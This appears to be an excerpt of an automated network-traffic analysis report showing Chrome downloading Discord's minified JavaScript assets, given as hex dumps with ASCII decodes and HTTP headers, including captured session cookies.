                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 72 3f 72 3a 72 2e 63 73 73 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 36 20 34 68 2e 35 76 2d 2e 35 61 32 2e 35 20 32 2e 35 20 30 20 30 20 31 20 35 20 30 56 34 68 2e 35 61 31 20 31 20 30 20 30 20 31 20 31 20 31 76 34 61 31 20 31 20 30 20 30 20 31 2d 31 20 31 68 2d 36 61 31 20 31 20 30 20 30 20 31 2d 31 2d 31 56 35 61 31 20 31 20 30 20 30 20 31 20 31 2d 31 5a 6d 34 2d 2e 35 56 34 68 2d 32 76 2d 2e 35 61 31 20 31 20 30 20 31 20 31 20 32 20 30 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 69 7d 29 2c 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69
                                                                          Data Ascii: (0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,fillRule:"evenodd",d:"M16 4h.5v-.5a2.5 2.5 0 0 1 5 0V4h.5a1 1 0 0 1 1 1v4a1 1 0 0 1-1 1h-6a1 1 0 0 1-1-1V5a1 1 0 0 1 1-1Zm4-.5V4h-2v-.5a1 1 0 1 1 2 0Z",clipRule:"evenodd",className:i}),(0,a.jsx)("path",{fi
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 38 20 30 63 2d 2e 31 36 2e 30 33 2d 2e 33 32 2d 2e 30 37 2d 2e 33 33 2d 2e 32 33 6c 2d 2e 32 31 2d 32 2e 30 32 61 2e 35 2e 35 20 30 20 30 20 31 20 2e 35 2d 2e 35 35 5a 4d 31 39 20 39 61 31 20 31 20 30 20 31 20 30 20 30 2d 32 20 31 20 31 20 30 20 30 20 30 20 30 20 32 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 69 7d 29 2c 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 72 3f 72 3a 72 2e 63 73 73 2c 64 3a 22 4d 31 34 2e 38 20 33 2e 33 34 61 2e 34 38 2e 34 38 20 30 20 30 20 30 2d 2e 32 34 2d 2e 36 39 41 39 2e 39 34 20 39 2e 39 34 20 30 20 30 20 30 20 31 31 20 32 63 2d 34 2e 39 37 20 30 2d 39 20 33 2e 35 38 2d 39 20 38 20 30 20 31 2e 35
                                                                          Data Ascii: 8 0c-.16.03-.32-.07-.33-.23l-.21-2.02a.5.5 0 0 1 .5-.55ZM19 9a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z",clipRule:"evenodd",className:i}),(0,a.jsx)("path",{fill:"string"==typeof r?r:r.css,d:"M14.8 3.34a.48.48 0 0 0-.24-.69A9.94 9.94 0 0 0 11 2c-4.97 0-9 3.58-9 8 0 1.5
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 34 36 39 31 22 29 3b 76 61 72 20 6e 3d 74 28 22 36 36 39 34 39 31 22 29 2c 73 3d 74 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 72 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 6c 3d 32 34 2c 68 65 69 67 68 74 3a 74 3d 32 34 2c 63 6f 6c 6f 72 3a 72 3d 6e 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 69 3d 22 22 2c 2e 2e 2e 63 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 63 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 6c 2c 68 65 69 67 68 74 3a 74 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42
                                                                          Data Ascii: 4691");var n=t("669491"),s=t("75196");let r=e=>{let{width:l=24,height:t=24,color:r=n.default.colors.INTERACTIVE_NORMAL,colorClass:i="",...c}=e;return(0,a.jsx)("svg",{...(0,s.default)(c),xmlns:"http://www.w3.org/2000/svg",width:l,height:t,fill:"none",viewB


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          274192.168.2.550009162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/47146.57a6c7b40e47673fbb30.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
                                                                          2023-12-10 16:45:14 UTC975INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 33 38 35 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 33 33 65 36 63 37 34 37 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:14 GMTContent-Type: application/javascriptContent-Length: 43858Connection: closeCF-Ray: 8336f5033e6c7471-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 37 31 34 36 22 5d 2c 7b 39 36 38 31 39 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 72 28 74 29 2c 69 2e 64 28 74 2c 7b 73 79 6e 63 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 70 6c 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 67 65 74 4d 65 74 61 64 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 69 28 22 37 30 31 30 32 22 29 3b 76 61 72 20 6e 3d 69 28 22 38 37 32 37 31 37 22 29 2c 6c 3d 69 28 22 39 31 33
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["47146"],{968194:function(e,t,i){"use strict";i.r(t),i.d(t,{sync:function(){return r},play:function(){return d},getMetadata:function(){return o}}),i("70102");var n=i("872717"),l=i("913
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 74 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 65 2e 6c 6f 61 64 44 61 74 65 2c 6e 75 6c 6c 21 3d 3d 28 69 3d 74 68 69 73 2e 5f 6c 6f 61 64 49 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 65 2e 6c 6f 61 64 49 64 29 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 64 2e 41 6e 61 6c 79 74 69 63 73 43 6f 6e 74 65 78 74 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 63 2c 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 7d 72 65 6e 64 65 72 28 29 7b 6c 65 74 7b 63 6f 6e 74 65 78 74 3a 65 7d 3d 74 68 69 73 2e 70 72 6f 70 73 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 3f 74 68 69 73 2e 72 65 6e 64 65 72 50 72 6f 76 69 64 65 72 28 65 29 3a 28 30 2c 61 2e 6a 73 78 29 28 64 2e 41 6e 61 6c 79 74 69 63 73 43 6f 6e 74 65 78 74 2e 43 6f 6e 73 75 6d 65 72 2c 7b
                                                                          Data Ascii: te)&&void 0!==t?t:e.loadDate,null!==(i=this._loadId)&&void 0!==i?i:e.loadId);return(0,a.jsx)(d.AnalyticsContext.Provider,{value:c,children:o})}render(){let{context:e}=this.props;return null!=e?this.renderProvider(e):(0,a.jsx)(d.AnalyticsContext.Consumer,{
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 6c 65 45 6e 61 62 6c 65 44 65 76 65 6c 6f 70 65 72 41 63 74 69 76 69 74 79 53 68 65 6c 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 2c 74 6f 67 67 6c 65 55 73 65 41 63 74 69 76 69 74 79 55 72 6c 4f 76 65 72 72 69 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 73 65 74 41 63 74 69 76 69 74 79 55 72 6c 4f 76 65 72 72 69 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 2c 6d 61 72 6b 41 63 74 69 76 69 74 79 55 73 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 75 70 64 61 74 65 46 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 6e 3d 69 28 22 39 31 33 31 34 34 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 6e 2e 64 65
                                                                          Data Ascii: leEnableDeveloperActivityShelf:function(){return l},toggleUseActivityUrlOverride:function(){return a},setActivityUrlOverride:function(){return u},markActivityUsed:function(){return r},updateFilter:function(){return d}});var n=i("913144");function l(){n.de
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 2e 61 63 74 69 76 69 74 79 29 3a 76 6f 69 64 20 30 2c 6e 3d 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 61 63 74 69 76 69 74 79 29 21 3d 6e 75 6c 6c 3f 28 30 2c 67 2e 64 65 66 61 75 6c 74 29 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 61 63 74 69 76 69 74 79 29 3a 76 6f 69 64 20 30 2c 6c 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 61 63 74 69 76 69 74 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 63 6c 69 65 6e 74 5f 70 6c 61 74 66 6f 72 6d 5f 63 6f 6e 66 69 67 5b 28 30 2c 44 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 54 2e 67 65 74 4f 53 29 28 29 29 5d 2e 72 65 6c 65 61 73 65 5f 70 68 61 73 65 3b 72 65 74 75 72 6e 7b 69 73 50 72 65 6d 69 75 6d 41 63 74 69 76 69 74 79 3a 69
                                                                          Data Ascii: .activity):void 0,n=(null==e?void 0:e.activity)!=null?(0,g.default)(null==e?void 0:e.activity):void 0,l=null==e?void 0:null===(t=e.activity)||void 0===t?void 0:t.client_platform_config[(0,D.default)((0,T.getOS)())].release_phase;return{isPremiumActivity:i
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 45 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 69 3d 45 2e 61 63 74 69 76 69 74 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 73 68 65 6c 66 5f 72 61 6e 6b 2c 73 68 65 6c 66 5f 73 6f 72 74 65 64 5f 72 61 6e 6b 3a 54 3e 30 3f 54 3a 6e 75 6c 6c 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 59 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 61 63 74 69 76 69 74 79 5f 69 64 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 77 28 65 29 7b 76 61 72 20 74 2c 69 3b 6c 65 74 7b 63 68 61 6e 6e 65 6c 49 64 3a 6e 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 6c 7d 3d 65 2c 61 3d 55 5b 6c 5d 2c 75 3d 66 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 28 6e 29 2c 72 3d 53 2e 64 65 66 61 75 6c 74 2e 67 65
                                                                          Data Ascii: E?void 0:null===(i=E.activity)||void 0===i?void 0:i.shelf_rank,shelf_sorted_rank:T>0?T:null})}}function Y(e){return null==e?void 0:e.activity_id}async function w(e){var t,i;let{channelId:n,applicationId:l}=e,a=U[l],u=f.default.getChannel(n),r=S.default.ge
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 30 21 3d 3d 69 26 26 69 26 26 6f 2e 6c 65 6e 67 74 68 3c 3d 31 26 26 76 6f 69 64 20 30 3d 3d 3d 75 2e 66 69 6e 64 28 65 3d 3e 65 2e 75 73 65 72 5f 69 64 3d 3d 3d 64 29 26 26 61 2e 64 65 66 61 75 6c 74 2e 73 65 6c 65 63 74 50 61 72 74 69 63 69 70 61 6e 74 28 6e 2c 6e 75 6c 6c 29 2c 21 75 2e 73 6f 6d 65 28 65 3d 3e 65 2e 75 73 65 72 5f 69 64 3d 3d 3d 64 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 45 3d 5f 2e 64 65 66 61 75 6c 74 2e 67 65 74 4d 65 64 69 61 53 65 73 73 69 6f 6e 49 64 28 29 2c 7b 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 3a 41 7d 3d 6c 2c 49 3d 59 28 6c 29 3b 6e 75 6c 6c 21 3d 41 26 26 6e 75 6c 6c 21 3d 49 26 26 6e 75 6c 6c 21 3d 45 26 26 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 52 5b 41 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 63 61 6c 6c 28
                                                                          Data Ascii: 0!==i&&i&&o.length<=1&&void 0===u.find(e=>e.user_id===d)&&a.default.selectParticipant(n,null),!u.some(e=>e.user_id===d))return;let E=_.default.getMediaSessionId(),{application_id:A}=l,I=Y(l);null!=A&&null!=I&&null!=E&&(null===(t=R[A])||void 0===t||t.call(
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 66 61 75 6c 74 2e 75 6e 73 75 62 73 63 72 69 62 65 28 22 45 4d 42 45 44 44 45 44 5f 41 43 54 49 56 49 54 59 5f 43 4c 4f 53 45 22 2c 77 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 75 6e 73 75 62 73 63 72 69 62 65 28 22 45 4d 42 45 44 44 45 44 5f 41 43 54 49 56 49 54 59 5f 49 4e 42 4f 55 4e 44 5f 55 50 44 41 54 45 22 2c 47 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 75 6e 73 75 62 73 63 72 69 62 65 28 22 45 4d 42 45 44 44 45 44 5f 41 43 54 49 56 49 54 59 5f 44 45 46 45 52 52 45 44 5f 4f 50 45 4e 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 44 65 66 65 72 72 65 64 4f 70 65 6e 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 75 6e 73 75 62 73 63 72 69 62 65 28 22 52 50 43 5f 41 50 50 5f 44 49 53 43 4f 4e 4e 45 43 54 45 44 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 52 50 43 44 69 73 63 6f 6e 6e 65
                                                                          Data Ascii: fault.unsubscribe("EMBEDDED_ACTIVITY_CLOSE",w),l.default.unsubscribe("EMBEDDED_ACTIVITY_INBOUND_UPDATE",G),l.default.unsubscribe("EMBEDDED_ACTIVITY_DEFERRED_OPEN",this.handleDeferredOpen),l.default.unsubscribe("RPC_APP_DISCONNECTED",this.handleRPCDisconne
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 65 20 4d 2e 41 62 6f 72 74 43 6f 64 65 73 2e 49 4e 56 41 4c 49 44 5f 50 45 52 4d 49 53 53 49 4f 4e 53 3a 6e 3d 62 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 45 4d 42 45 44 44 45 44 5f 41 43 54 49 56 49 54 49 45 53 5f 49 4e 56 41 4c 49 44 5f 50 45 52 4d 49 53 53 49 4f 4e 53 3b 62 72 65 61 6b 3b 63 61 73 65 20 4d 2e 41 62 6f 72 74 43 6f 64 65 73 2e 49 4e 56 41 4c 49 44 5f 41 43 54 49 56 49 54 59 5f 4c 41 55 4e 43 48 5f 41 46 4b 5f 43 48 41 4e 4e 45 4c 3a 6e 3d 62 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 45 4d 42 45 44 44 45 44 5f 41 43 54 49 56 49 54 49 45 53 5f 49 4e 56 41 4c 49 44 5f 43 48 41 4e 4e 45 4c 3b 62 72 65 61 6b 3b 63 61 73 65 20 4d 2e 41 62 6f 72 74 43 6f 64 65 73 2e 49 4e 56 41 4c 49 44 5f 41 43 54 49 56 49 54 59 5f 4c
                                                                          Data Ascii: e M.AbortCodes.INVALID_PERMISSIONS:n=b.default.Messages.EMBEDDED_ACTIVITIES_INVALID_PERMISSIONS;break;case M.AbortCodes.INVALID_ACTIVITY_LAUNCH_AFK_CHANNEL:n=b.default.Messages.EMBEDDED_ACTIVITIES_INVALID_CHANNEL;break;case M.AbortCodes.INVALID_ACTIVITY_L
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 49 26 26 28 61 77 61 69 74 20 72 2e 64 65 66 61 75 6c 74 2e 66 65 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 28 49 29 2c 61 3d 64 2e 64 65 66 61 75 6c 74 2e 67 65 74 41 70 70 6c 69 63 61 74 69 6f 6e 28 49 29 29 3b 6c 65 74 20 54 3d 66 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 28 75 29 2c 43 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 54 3f 76 6f 69 64 20 30 3a 54 2e 67 65 74 47 75 69 6c 64 49 64 28 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 76 6f 69 64 20 30 2c 7b 61 63 74 69 76 69 74 79 43 6f 6e 66 69 67 73 3a 44 2c 61 70 70 6c 69 63 61 74 69 6f 6e 73 3a 4f 7d 3d 61 77 61 69 74 20 28 30 2c 76 2e 66 65 74 63 68 53 68 65 6c 66 29 28 7b 67 75 69 6c 64 49 64 3a 43 7d 29 2c 67 3d 28 30 2c 4e 2e 64 65 66 61 75 6c 74 29 28 7b 61 70
                                                                          Data Ascii: I&&(await r.default.fetchApplication(I),a=d.default.getApplication(I));let T=f.default.getChannel(u),C=null!==(n=null==T?void 0:T.getGuildId())&&void 0!==n?n:void 0,{activityConfigs:D,applications:O}=await (0,v.fetchShelf)({guildId:C}),g=(0,N.default)({ap


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          275192.168.2.550011162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/98086.6b10664a8a1ecdf8a01d.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
                                                                          2023-12-10 16:45:14 UTC970INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 35 34 34 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 33 62 62 61 64 37 34 38 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:14 GMTContent-Type: application/javascriptContent-Length: 654418Connection: closeCF-Ray: 8336f503bbad7489-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:14 UTC399INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 39 38 30 38 36 22 5d 2c 7b 39 35 32 31 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 73 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 73 29 2c 6e 2e 64 28 73 2c 7b 65 6d 6f 6a 69 54 65 72 6d 73 49 6d 70 6f 72 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 6c 65 74 20 69 3d 7b 62 67 3a 28 29 3d 3e 6e 2e 65 6c 28 22 33 32 36 37 37 38 22 29 2e 74 68 65 6e 28 6e 2e 74 2e 62 69 6e 64 28 6e 2c 22 33 32 36 37 37 38 22 2c 31 39 29 29 2c 63 73 3a 28 29 3d 3e 6e 2e 65 6c 28 22 38 33 38 32 36 34 22 29 2e 74
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["98086"],{952110:function(e,s,n){"use strict";n.r(s),n.d(s,{emojiTermsImporter:function(){return i}});let i={bg:()=>n.el("326778").then(n.t.bind(n,"326778",19)),cs:()=>n.el("838264").t
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 30 34 36 22 29 2e 74 68 65 6e 28 6e 2e 74 2e 62 69 6e 64 28 6e 2c 22 31 36 30 34 36 22 2c 31 39 29 29 2c 22 65 6e 2d 55 53 22 3a 28 29 3d 3e 6e 2e 65 6c 28 22 32 34 30 34 31 39 22 29 2e 74 68 65 6e 28 6e 2e 74 2e 62 69 6e 64 28 6e 2c 22 32 34 30 34 31 39 22 2c 31 39 29 29 2c 22 65 73 2d 45 53 22 3a 28 29 3d 3e 6e 2e 65 6c 28 22 36 31 33 33 36 34 22 29 2e 74 68 65 6e 28 6e 2e 74 2e 62 69 6e 64 28 6e 2c 22 36 31 33 33 36 34 22 2c 31 39 29 29 2c 66 69 3a 28 29 3d 3e 6e 2e 65 6c 28 22 36 34 31 38 31 39 22 29 2e 74 68 65 6e 28 6e 2e 74 2e 62 69 6e 64 28 6e 2c 22 36 34 31 38 31 39 22 2c 31 39 29 29 2c 66 72 3a 28 29 3d 3e 6e 2e 65 6c 28 22 33 39 36 31 30 33 22 29 2e 74 68 65 6e 28 6e 2e 74 2e 62 69 6e 64 28 6e 2c 22 33 39 36 31 30 33 22 2c 31 39 29 29 2c 68 72
                                                                          Data Ascii: 046").then(n.t.bind(n,"16046",19)),"en-US":()=>n.el("240419").then(n.t.bind(n,"240419",19)),"es-ES":()=>n.el("613364").then(n.t.bind(n,"613364",19)),fi:()=>n.el("641819").then(n.t.bind(n,"641819",19)),fr:()=>n.el("396103").then(n.t.bind(n,"396103",19)),hr
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 31 35 36 22 2c 22 2e 2f 31 66 31 37 65 2e 73 76 67 22 3a 22 31 37 37 34 32 34 22 2c 22 2e 2f 31 66 31 37 66 2e 73 76 67 22 3a 22 39 37 30 34 31 31 22 2c 22 2e 2f 31 66 31 38 65 2e 73 76 67 22 3a 22 37 30 34 38 36 38 22 2c 22 2e 2f 31 66 31 39 31 2e 73 76 67 22 3a 22 39 31 36 38 37 34 22 2c 22 2e 2f 31 66 31 39 32 2e 73 76 67 22 3a 22 31 36 33 31 36 30 22 2c 22 2e 2f 31 66 31 39 33 2e 73 76 67 22 3a 22 36 37 33 38 39 30 22 2c 22 2e 2f 31 66 31 39 34 2e 73 76 67 22 3a 22 37 33 31 36 31 35 22 2c 22 2e 2f 31 66 31 39 35 2e 73 76 67 22 3a 22 34 37 31 34 36 33 22 2c 22 2e 2f 31 66 31 39 36 2e 73 76 67 22 3a 22 37 31 32 30 32 38 22 2c 22 2e 2f 31 66 31 39 37 2e 73 76 67 22 3a 22 37 34 38 30 30 35 22 2c 22 2e 2f 31 66 31 39 38 2e 73 76 67 22 3a 22 31 35 34 36 35
                                                                          Data Ascii: 156","./1f17e.svg":"177424","./1f17f.svg":"970411","./1f18e.svg":"704868","./1f191.svg":"916874","./1f192.svg":"163160","./1f193.svg":"673890","./1f194.svg":"731615","./1f195.svg":"471463","./1f196.svg":"712028","./1f197.svg":"748005","./1f198.svg":"15465
